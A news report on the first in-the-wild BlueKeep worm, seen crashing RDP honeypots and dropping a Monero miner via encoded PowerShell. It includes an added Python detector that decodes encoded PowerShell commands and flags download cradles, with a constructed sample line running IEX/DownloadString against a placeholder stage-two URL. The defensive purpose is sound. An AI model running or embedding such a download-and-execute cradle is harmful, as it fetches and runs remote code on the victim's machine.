Security researchers are seeing the first indications of self-replicating malware or worms exploiting unpatched Windows systems vulnerable to the BlueKeep remote desktop protocol flaw.
Over the weekend, well-known OpenSecurity.global researcher Kevin Beaumont tweeted that his EternalPot RDP honeypots had started crashing with the Windows Blue Screen of Death (BSoD) in every region they were deployed in, except Australia.
Honeypots are systems specifically set up by security researchers to catch exploit attempts.
Marcus Hutchins, a researcher who rose to instant fame after mitigating the destructive WannaCry ransomware attack and was afterwards arrested by United States authorities for alleged malware dissemination, chipped in with a preliminary analysis of the crashes.
Hutchins suspected they're due to a BlueKeep worm making the rounds.
It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr — MalwareTech (@MalwareTechBlog) November 2, 2019
Further analysis by Hutchins confirmed that this is a BlueKeep exploit, arriving some six months after the vulnerability was published.
The malicious code delivered by the worm downloads and executes a series of encoded Windows PowerShell commands.
These fetch another payload, an executable that runs a miner for the Monero cryptocurrency.
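The encoded PowerShell stage described above is something defenders can look for in process-creation telemetry. The following is an added example, not code from the article or from any of the researchers it quotes: it scans constructed process-creation log lines for the PowerShell `-EncodedCommand` switch (and its accepted abbreviations), decodes the base64/UTF-16LE argument, and flags commands that contain download-and-execute indicators. The log line layout, the host names, and the `example.invalid` URL are assumptions made for this example.

```python
import base64
import binascii
import re

# Matches the -EncodedCommand switch and the common abbreviations PowerShell
# accepts for it, followed by the base64 argument. Assumption: the log stores
# the whole command line in one field, as Sysmon event 1 or Security 4688 do.
ENCODED_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)

# Substrings typical of a PowerShell download-and-execute stage. Their presence
# in a decoded command raises a finding from "review" to "high".
CRADLE_INDICATORS = (
    "net.webclient", "downloadstring", "downloadfile",
    "invoke-webrequest", "invoke-expression", "iex ", "start-bitstransfer",
)


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str):
    """Reverse encode_command; return None if the blob is not base64 UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_line(line: str):
    """Return a finding dict for a line carrying an encoded command, else None."""
    match = ENCODED_SWITCH.search(line)
    if not match:
        return None
    decoded = decode_command(match.group(1))
    if decoded is None:
        # Undecodable argument: still worth an analyst's eyes, but no verdict.
        return {"line": line, "decoded": None, "indicators": [], "severity": "review"}
    lowered = decoded.lower()
    hits = [ind.strip() for ind in CRADLE_INDICATORS if ind in lowered]
    return {
        "line": line,
        "decoded": decoded,
        "indicators": hits,
        "severity": "high" if hits else "review",
    }


def scan(lines):
    """Run analyze_line over every log line and keep only the findings."""
    return [f for f in map(analyze_line, lines) if f is not None]


# Constructed sample telemetry (not from the article). The second line carries a
# classic download cradle pointing at a placeholder URL; the third is a benign
# encoded command; the fourth is an odd-length blob that cannot be UTF-16LE.
STAGE2_URL = "http://example.invalid/stage2.ps1"  # placeholder, constructed
CRADLE = f"IEX (New-Object Net.WebClient).DownloadString('{STAGE2_URL}')"

SAMPLE_LOG_LINES = [
    "2019-11-02T10:14:07Z host01 powershell.exe -Command Get-Process",
    "2019-11-02T10:15:31Z host01 powershell.exe -NoP -W Hidden -enc "
    + encode_command(CRADLE),
    "2019-11-02T10:16:02Z host02 powershell.exe -EncodedCommand "
    + encode_command("Get-Date"),
    "2019-11-02T10:16:45Z host02 powershell.exe -ec "
    + base64.b64encode(b"seventeen bytes!!").decode("ascii"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG_LINES):
        print(finding["severity"].upper(), finding["indicators"], finding["decoded"])
```

Decoding before matching matters: the download cradle is invisible in the raw command line, so a rule that only looks for `Net.WebClient` in the logged text would miss exactly the stage the worm uses. Flagging every encoded command for review, and escalating only when the decoded script contains a download indicator, keeps the noise from legitimate administrative scripts manageable.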
Beaumont later said that "we found definite BlueKeep exploitation in wild across every country with a RDP honeypot (except Australia)."
He added in a blog post that there are over 724,000 internet-accessible systems that are not patched against the BlueKeep vulnerability.
Administrators should also patch internal systems against BlueKeep, as history has shown that worms can spread to these as well.
Microsoft has warned that the BlueKeep vulnerability is extremely serious, and could lead to another WannaCry malware epidemic, or worse.
Patches have been issued for vulnerable Windows systems, including Windows XP and Windows Server 2003, both of which are long out of support.
The Australian Cyber Security Centre has urged administrators to apply the available patches as soon as possible.